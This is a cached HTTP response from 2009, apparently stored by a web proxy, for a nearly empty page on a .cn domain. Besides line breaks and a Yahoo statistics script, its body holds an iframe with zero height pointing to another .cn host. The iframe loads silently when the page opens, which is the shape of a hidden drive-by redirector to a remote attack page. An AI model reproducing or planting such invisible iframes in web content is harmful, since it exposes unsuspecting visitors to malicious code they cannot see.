HTTP/1.1 200 OK
Content-Length: 332
ETag: "def1818d294c91:403"
Date: Tue, 24 Feb 2009 10:24:29 GMT
Last-Modified: Sat, 21 Feb 2009 08:58:24 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://q.fgjg1.cn/hjll/25.htm
X-Polipo-Date: Tue, 24 Feb 2009 10:34:35 GMT
X-Polipo-Access: Wed, 18 Mar 2009 15:03:04 GMT

 <br>
<br>
<br>
<iframe src=http://z.kghh1.cn/d2/fxx.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>

<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/835667/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/835667/ystat.gif"/></a></noscript>
